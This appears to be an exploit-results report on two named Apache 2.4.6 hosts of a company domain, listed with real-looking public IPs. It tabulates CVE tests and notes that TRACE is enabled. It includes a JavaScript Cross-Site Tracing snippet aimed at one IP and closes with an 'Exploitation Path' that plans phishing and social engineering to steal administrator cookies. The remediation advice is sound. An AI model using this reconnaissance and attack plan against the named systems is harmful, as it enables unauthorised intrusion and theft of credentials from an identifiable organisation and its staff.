# Apache 2.4.6 Exploit Results — gitlab_pharmalink_id
# Date: 2026-09-07

## Targets

| IP | Host | Apache | Status |
|----|------|--------|--------|
| 54.251.28.144 | apps.pharmalink.id | 2.4.6 | ✅ TRACE enabled |
| 18.140.103.153 | staging-apps | 2.4.6 | ✅ TRACE enabled |

## CVEs Tested

| CVE | Module | Test | Result |
|-----|--------|------|--------|
| CVE-2013-1896 | mod_dav (MERGE) | MERGE / | **405 Method Not Allowed** — mod_dav NOT enabled |
| CVE-2013-2249 | mod_session_dbd | — | Not applicable (no session) |
| CVE-2014-0117 | mod_proxy (Connection) | — | Not applicable (no proxy) |
| CVE-2014-0226 | mod_proxy (race) | — | Not applicable (no proxy) |
| CVE-2021-40438 | mod_proxy | — | Not applicable (no proxy) |
| TRACE method | TRACE / | **200 OK** — **VULNERABLE** |

## TRACE Method Enabled (XST)

| Test | Result |
|------|--------|
| TRACE / | ✅ Enabled |
| X-Test header reflected | ✅ Yes |

**Impact:** Cross-Site Tracing (XST) — steal cookies, bypass HttpOnly

**Exploit:**
```javascript
// JavaScript XST attack
var xhr = new XMLHttpRequest();
xhr.open('TRACE', 'https://54.251.28.144/', false);
xhr.send(null);
// xhr.responseText contains all headers including cookies
```

## Other Tests

| Test | apps | staging |
|------|------|---------|
| /cgi-bin/ | 403 Forbidden | 403 Forbidden |
| /.htaccess | 403 Forbidden | 403 Forbidden |
| /server-status | 404 Not Found | 404 Not Found |
| /server-info | 404 Not Found | 404 Not Found |
| OPTIONS | TRACE,GET,HEAD,POST,OPTIONS | TRACE,GET,HEAD,POST,OPTIONS |

## Findings

| Finding | Severity | Notes |
|---------|----------|-------|
| TRACE enabled | **MEDIUM** | XST possible |
| No mod_dav | — | Not vulnerable to CVE-2013-1896 |
| No mod_proxy | — | Not vulnerable to proxy CVEs |
| Default page | LOW | Information disclosure |
| Old Apache | MEDIUM | 2.4.6 from 2013 |

## Recommendations

1. **Disable TRACE** — Add `TraceEnable off` to httpd.conf
2. **Upgrade Apache** — 2.4.6 is 10+ years old
3. **Hide server version** — `ServerTokens Prod`

## Exploitation Path

**Current:** No direct RCE via Apache 2.4.6 CVEs

**Possible:**
1. XST phishing — steal admin cookies
2. Social engineering — TRACE + XSS
3. Wait for app-level vulns (not Apache)

**Conclusion:** Apache 2.4.6 itself is not directly exploitable without mod_dav/mod_proxy. TRACE is the only finding.
